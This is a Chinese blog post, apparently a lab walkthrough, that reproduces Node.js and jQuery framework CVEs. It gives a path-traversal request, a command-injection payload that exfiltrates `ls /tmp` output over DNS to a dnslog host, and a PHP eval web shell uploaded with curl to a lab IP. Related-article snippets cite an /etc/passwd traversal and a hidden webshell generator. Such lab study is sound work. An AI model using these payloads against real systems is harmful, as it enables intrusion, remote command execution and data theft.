框架安全&CVE复现&Django&Flask&Node.JS&JQuery

最新推荐文章于 2023-08-15 11:18:53 发布
最新推荐文章于 2023-08-15 11:18:53 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: web渗透 文章标签: 安全 django flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54882883/article/details/126495095
版权

在这里插入图片描述

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

在这里插入图片描述

在这里插入图片描述

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

在这里插入图片描述

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

在这里插入图片描述

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform
在这里插入图片描述

获取一个url

在这里插入图片描述

这时候套用模板就可以了

/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

替换上面的url

/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)

在这里插入图片描述

直接替换上

然后访问

这个时候我们回到那个工具网站

在这里插入图片描述

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

在这里插入图片描述

然后写一个一句话木马

<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

在这里插入图片描述

curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

在这里插入图片描述

/jquery-upload-file/

在这里插入图片描述

在这里插入图片描述

无聊的知识
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 794
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
Node.js-目录穿越(CVE-2017-14849)
bqnagus
10-02 1079
Node.js 8.5.0 对⽬录进⾏normalize操作时出现了逻辑错误,导致向上层跳跃
Node.Js命令执行漏洞(CVE-2021-21315)复现及排查
dayouzi的博客
08-15 1283
Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
【python实现生成隐藏的一句话木马】
qq_55213436的博客
07-28 1972
这个webshell的原理就是每一行最后都有空格与制表符。\t的数量代表着ascii码16进制的第一位,空格的数量代表着ascii码16进制的第二位。然后有个关键的15,其实代表了前15行的空白字符组成的是create_function,后面就可以写一句话咯,例如@eval($_GET["pass"]);demo.php这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。...
Node.js 常见漏洞学习与总结
weixin_50464560的博客
10-01 3643
转载https://threezh1.com/2020/01/30/NodeJsVulns/ 危险函数所导致的命令执行eval()eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。和PHP中eval函数一样,如果传递到函数中的参数可控并且没有经过严格的过滤时,就会导致漏洞的出现。 简单例子: main.js 1234567891011var express = require("express");var app = express();app.get('/eval',fu
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升漏洞 和 CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p...
CVE-2022-22980 exp && 靶场.zip
最新发布
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CVE-2021-21315 Linux sudoNode.js命令注入
weixin_47179815的博客
07-15 1541
Node.js是一个基于ChromeV8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。...
Node.js目录穿越漏洞(CVE-2017-14849)
m0_65247093的博客
05-26 1217
影响版本(wappalyzer) Node.js 8.5.0 + Express 3.19.0-3.21.2 Node.js 8.5.0 + Express 4.11.0-4.15.5 Express框架: Express是基于Node.js平台,快速、开放、极简的web开发框架 漏洞本质: 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(...
服务攻防-框架安全&CVE 复现&Django&Flask&Node.JS&JQuery& Solr
m0_61506558的博客
12-21 317
(一)Python-开发框架安全-Django&FlaskDjango是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。感兴趣的可以看上面的文章,思路几乎是一致的,通过Fuzz测试出来的。
DjangoFlask漏洞合集
小小猪的博客
08-20 3362
Django漏洞 Django任意代码执行 poc: import os os.environ.setdefault('DJANGO_SETTINGS_MODULE','settings') from django.conf import settings from django.core import signing from django.contrib.sessions.backends import signed_cookies class
Node.js 目录穿越漏洞(CVE-2017-14849)
锋刃科技的博客
06-21 2041
漏洞分析 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是../../../../../../etc/passwd。 express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于norma
Nodejs惊爆重大漏洞
keketebiluodi的博客
06-15 5953
作者:CNVD近日,国家信息安全漏洞共享平台(CNVD)收录了Node.js反序列化远程代码执行漏洞(CNVD-2017-01206,对应 CVE-2017-594)。攻利用漏洞执行远程执行操作系统指令,获得服务器权限。由于目前验证代码已经公开,极有可能诱发大规模网站攻击。一、漏洞情况分析Nodejs是一个Javascript运行环境(runtime),对Google V8引擎进行了封装。Node...
Flask(Jinja2) 服务端模板注入漏洞
浅笑996的博客
12-11 1298
原理 参考文章: https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...
Python Flask服务同时接收单个、多个上传的文件
墨痕诉清风的博客
03-16 2303
服务端 import yara import os @app.route("/import/rule", methods=["POST"]) def import_rule(): uploaded_files = request.files.getlist("yar") for f_yar in uploaded_files: file_name = f_yar.filename _, extension = os.path.splitext(file
flask linux shell交互,Flask 编写shell脚本快速启动服务
weixin_29196613的博客
05-13 504
CVE 2017-10271漏洞复现(写入webshell)CVE 2017-10271漏洞复现(写入webshell) 1.简介 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性,备受广大系统管理员的青睐 2.复现环境 可自建也可以使用vulhub和docker快速搭建环境idea——j...
python的flask解决xss攻击漏洞
石磊
12-22 4734
版权声明:可以任意转载,转载时请标明文章原始出处-xjtushilei和作者信息:石磊 xss漏洞解决跨站脚本攻击的原理XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。跨站脚本攻击的危害:窃取c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无聊的知识

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值